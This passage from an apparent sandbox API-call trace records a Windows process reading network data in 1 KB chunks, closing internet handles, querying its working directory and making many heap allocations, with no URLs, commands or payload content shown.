lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.165] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.168] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.169] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.171] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.590] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0233.590] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0233.591] GetProcessHeap () returned 0x6b0000 [0233.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x244) returned 0x6e6430 [0233.593] GetProcessHeap () returned 0x6b0000 [0233.593] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1) returned 0x6e0170 [0233.593] GetCurrentDirectoryA (in: nBufferLength=0x103, lpBuffer=0x6e6570 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0233.595] GetProcessHeap () returned 0x6b0000 [0233.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x20) returned 0x6efe30 [0233.597] GetProcessHeap () returned 0x6b0000 [0233.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x404) returned 0x6e69e8 [0233.598] GetProcessHeap () returned 0x6b0000 [0233.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x80) returned 0x700810 [0233.599] GetProcessHeap () returned 0x6b0000 [0233.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x8) returned 0x6dffd0 [0233.603] GetProcessHeap () returned 0x6b0000 [0233.603] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x0) returned 0x6dffe0 [0233.610] _mbsstr (_Str=0x1982b0, _Substr=0x4263e0) returned 0x0 [0233.610] _mbsstr (_Str=0x1982b0, _Substr=0x4263e8) returned 0x0 [0233.610] _mbsstr (_Str=0x1982b0, _Substr=0x4263f0) returned 0x0 [0233.611] _mbsnbcpy (in: param_1=0x198690, param_2=0x1982b0, param_3=0x104 | out: param_1=0x198690) returned 0x198690 [0233.611] SystemTimeToFileTime (in: lpSystemTime=0x1981c0, lpFileTime=0x1981d0 | out: lpFileTime=0x1981d0) returned 1 [0233.611] LocalFileTimeToFileTime (in: lpLocalFileTime=0x1983c0, lpFileTime=0x198504 | out: lpFileTime=0x198504) returned 1 [0233.611] GetProcessHeap () returned 0x6b0000 [0233.611] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x9d9d8) returned 0xeee4020 [0233.626] GetProcessHeap () returned 0x6b0000 [0233.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x84) returned 0x6fc048 [0233.627] GetProcessHeap () returned 0x6b0000 [0233.627] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4000) returned 0x7052d8 [0233.627] GetProcessHeap () returned 0x6b0000 [0233.627] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6d7e00 [0233.630] GetProcessHeap () returned 0x6b0000 [0233.630] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x40) returned 0x6ed188 [0233.630] GetProcessHeap () returned 0x6b0000 [0233.630] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2d00) returned 0x7092e0 [0233.630] GetProcessHeap () returned 0x6b0000 [0233.630] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x8000) returned 0x70bfe8 [0233.633] GetProcessHeap () returned 0x6b0000 [0233.633] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4f0) returned 0x6e6df8 [0233.635] GetProcessHeap () returned 0x6b0000 [0233.635] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb2b8 [0233.635] GetProcessHeap () returned 0x6b0000 [0233.635] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x6e72f0 [0233.635] GetProcessHeap () returned 0x6b0000 [0233.635] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efbb0 [0233.638] GetProcessHeap () returned 0x6b0000 [0233.638] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4e8) returned 0x6e7778 [0233.638] GetProcessHeap () returned 0x6b0000 [0233.638] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb680 [0233.638] GetProcessHeap () returned 0x6b0000 [0233.638] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x6e7c68 [0233.638] GetProcessHeap () returned 0x6b0000 [0233.638] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efe08 [0233.641] GetProcessHeap () returned 0x6b0000 [0233.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4d4) returned 0x6e80f0 [0233.641] GetProcessHeap () returned 0x6b0000 [0233.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb998 [0233.641] GetProcessHeap () returned 0x6b0000 [0233.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x6e85d0 [0233.641] GetProcessHeap () returned 0x6b0000 [0233.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efbd8 [0233.643] GetProcessHeap () returned 0x6b0000 [0233.643] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c8) returned 0x6e8a58 [0233.644] GetProcessHeap () returned 0x6b0000 [0233.644] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb730 [0233.644] GetProcessHeap () returned 0x6b0000 [0233.644] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x6e8f28 [0233.644] GetProcessHeap () returned 0x6b0000 [0233.644] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efd68 [0233.646] GetProcessHeap () returned 0x6b0000 [0233.647] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4cc) returned 0x713ff0 [0233.647] GetProcessHeap () returned 0x6b0000 [0233.647] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb890 [0233.647] GetProcessHeap () returned 0x6b0000 [0233.647] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x7144c8 [0233.647] GetProcessHeap () returned 0x6b0000 [0233.647] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efc00 [0233.649] GetProcessHeap () returned 0x6b0000 [0233.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4f0) returned 0x714950 [0233.649] GetProcessHeap () returned 0x6b0000 [0233.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x6eb8e8 [0233.650] GetProcessHeap () returned 0x6b0000 [0233.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x714e48 [0233.650] GetProcessHeap () returned 0x6b0000 [0233.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efc28 [0233.653] GetProcessHeap () returned 0x6b0000 [0233.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4dc) returned 0x7152d0 [0233.653] GetProcessHeap () returned 0x6b0000 [0233.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x716290 [0233.653] GetProcessHeap () returned 0x6b0000 [0233.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x7167c0 [0233.653] GetProcessHeap () returned 0x6b0000 [0233.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efb88 [0233.654] GetProcessHeap () returned 0x6b0000 [0233.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4f0) returned 0x716c48 [0233.654] GetProcessHeap () returned 0x6b0000 [0233.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715e18 [0233.654] GetProcessHeap () returned 0x6b0000 [0233.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x717140 [0233.654] GetProcessHeap () returned 0x6b0000 [0233.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1c) returned 0x6efc50 [0233.656] GetProcessHeap () returned 0x6b0000 [0233.656] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4dc) returned 0x7175c8 [0233.656] GetProcessHeap () returned 0x6b0000 [0233.656] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4c) returned 0x715fd0 [0233.656] GetProcessHeap () returned 0x6b0000 [0233.656] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x480) returned 0x717ab0 [0233.657] GetProcessHeap () returned 0x6b0000 [0233.657] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, 